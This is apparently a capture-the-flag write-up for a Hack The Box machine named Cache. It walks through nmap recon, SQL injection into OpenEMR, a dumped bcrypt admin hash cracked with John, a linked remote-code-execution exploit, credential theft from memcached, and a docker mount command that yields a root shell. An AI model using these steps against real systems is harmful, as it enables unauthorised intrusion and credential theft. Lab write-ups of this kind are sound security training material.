Recon

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

So the target should be port 80. Run Dirbuster on port 80 without any useful input. One interesting thing is that the .js code on login page can be reviewed, which contains: The credential will be used later. (After spending few hours on other wrong directions), I notice that user redirect “cache.htb” as his own server domain, and he introduced his another project called “HMS”. So when I edit /etc/hosts to 10.10.10.188 HMS.htb, I am redirected to another login page, which cannot be accessed if the domain is not configured. For why this can happen: https://stackoverflow.com/questions/823534/difference-between-specifying-ip-in-host-file-vs-using-ip-directly Anyway, we start recon on a new page. Target domain contains service: openemr, which is vulnerable to multiple exploits. The exploit we first want to utilize is SQLInjection. I will not comment on details, but you can refer to: https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf The target DB contains many tables, and we can dump user_secure table from it (which contains useful information).

Table: users_secure
[1 entry]
+—-+——————————–+—————+————————————————————–+———————+—————+—————+——————-+——————-+
| id | salt | username | password | last_update | salt_history2 | salt_history1 | password_history2 | password_history1 |
+—-+——————————–+—————+————————————————————–+———————+—————+—————+——————-+——————-+
| 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL | NULL | NULL | NULL |
+—-+——————————–+—————+————————————————————–+———————+—————+—————+——————-+——————-+

The salted password for user openemr_admin is: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. Use John to decrypt

root@kali:~/htb/Cache_188# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-25 12:31) 4.545g/s 3927p/s 3927c/s 3927C/s tristan..felipe
Use the “–show” option to display all of the cracked passwords reliably
Session completed

So now, we can use the exploit online to gain www-data user: https://www.exploit-db.com/exploits/45161

User

www-data to user is pretty simple: su with the previous credentials. Then download lse.sh to target machine (do not that /tmp cannot be written) and it is easy to discover that local port 11211 is running some service. After further checking, I discover that the service is memecahced. To retrieve the data inside, I follow official documentation and https://stackoverflow.com/questions/19560150/get-all-keys-set-in-memcached The credential for the second user can be obtained from memcached.

Root

lse.sh again and find docker is running. Go to GTFOBins and find the corresponding command to generate a root shell.

luffy@cachdocker run -v /:/mnt –rm -it ubuntu chroot /mnt sh
docker run -v /:/mnt –rm -it ubuntu chroot /mnt sh

ls

ls
bin home lib64 opt sbin sys vmlinuz
boot initrd.img lost+found proc snap tmp vmlinuz.old
dev initrd.img.old media root srv usr
etc lib mnt run swap.img var

whoami

whoami
root